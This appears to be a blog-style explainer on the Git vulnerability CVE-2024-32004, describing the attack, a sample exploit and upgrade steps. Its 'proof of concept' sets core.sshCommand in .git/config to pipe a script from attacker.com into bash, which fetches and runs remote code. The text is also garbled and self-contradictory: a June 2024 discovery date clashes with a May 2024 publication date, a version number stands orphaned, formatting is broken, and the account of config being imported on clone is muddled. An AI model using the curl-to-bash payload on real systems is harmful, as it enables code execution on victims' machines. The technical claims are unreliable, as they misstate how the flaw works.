In June 2024, a serious security threat was discovered in Git, the world's most popular version control system. This flaw, now known as CVE-2024-32004, lets attackers secretly run any code they want on your computer if you clone a specially prepared Git repository. Below, we'll dive into what this vulnerability is, how attackers can exploit it, the technical details behind it, and most importantly, how you can protect yourself.
What Is CVE-2024-32004?
CVE-2024-32004 is a critical vulnerability found in Git versions before the recent patches. If you use Git to pull source code from someone else (by running git clone), a malicious actor can trick your system into running malware—without your knowledge—just by cloning their repo.
2.39.4
Patch released: June 2024
Official security advisory: GitHub Security Advisory (GHSA-qm7j-g9jr-jmpm)
CVE details: NIST CVE-2024-32004
How Does The Attack Work? (Simple Explanation)
Normally, when you run git clone, you expect to just pull files, not run programs. But due to this bug, an attacker can write a repo that, during cloning, runs dangerous code (like ransomware or stealer malware) on your machine.
The attack doesn’t rely on you running any files or scripts from the repo—it can execute code automatically just during Cloning.
The Root Cause
- Git stores settings in a .git/config file inside the repository.
Some of these settings can *trigger commands* during operations like fetching, checking out, etc.
- The bug allowed attackers to sneak dangerous configuration into new clones, leading to code execution.
Exploit Example: How Hackers Can Use This Vulnerability
Scenario: Attacker creates a malicious repo and hosts it on GitHub, or somewhere else public. Victim clones it using an *old* version of Git.
Attacker:
- Creates a repo with a .git/config file planted with dangerous hooks or clever settings.
`sh
git clone https://malicious-site.com/evil-repo.git
Example of Exploit Code Snippet
The exploit can use a core.sshCommand or alias setting to get code execution. Here’s a basic proof of concept:
How a .git/config file might look
[core]
sshCommand = /bin/bash -c 'curl http://attacker.com/e.sh | bash'
What does this do?
If this config is imported, and the victim attempts any SSH remote operation, their Git runs the attacker's code.
Auto-executing code with hooks (pre-2.45.1 vulnerable)
The attack is more subtle—attackers specially prepare the repo so that, when cloned, code runs immediately (see real PoC from Felix Wilhelm (Google)).
What Should You Do?
Upgrade Git NOW:
sudo apt install git=2.45.1
- On Windows:
- Download the latest installer: https://git-scm.com/download/win
- On macOS (Homebrew):
sh
brew update && brew upgrade git
<br><br><b>Don't have upgrade access?</b> <br>- <b>Workaround:</b> <br> <b>Never clone repositories from untrusted sources.</b> <br> If you must clone, *review* the remote repo, especially for weird .git/config` or hook files.
Disable unsafe features:
- See Git's config docs for dangerous settings.
- Avoid repositories that try to set or misuse:
- core.sshCommand
- hooks.*
- Any system-level configurations
---
## Further Reading & Real-World References
- Original GitHub Security Advisory
- CVE-2024-32004 at NVD
- Git's own announcement
- Felix Wilhelm's write-up (Google Security Research GitHub)
*(look here for a technical deconstruction and in-depth PoC)*
---
## Conclusion
CVE-2024-32004 is a major Git vulnerability that should not be underestimated. If you use Git (developer, sysadmin, or student), update ASAP. Never trust random GitHub repos with critical systems, especially if you haven't patched.
TL;DR: *If you haven’t upgraded Git since June 2024, do it now—or risk remote attackers taking over your machine with a single git clone.*
Stay safe, stay up to date!
---
*This post was tailored for clarity, simplicity, and actionable advice. Feel free to share it to help others avoid disaster.*
Timeline
Published on: 05/14/2024 19:15:11 UTC
Last modified on: 06/26/2024 10:15:12 UTC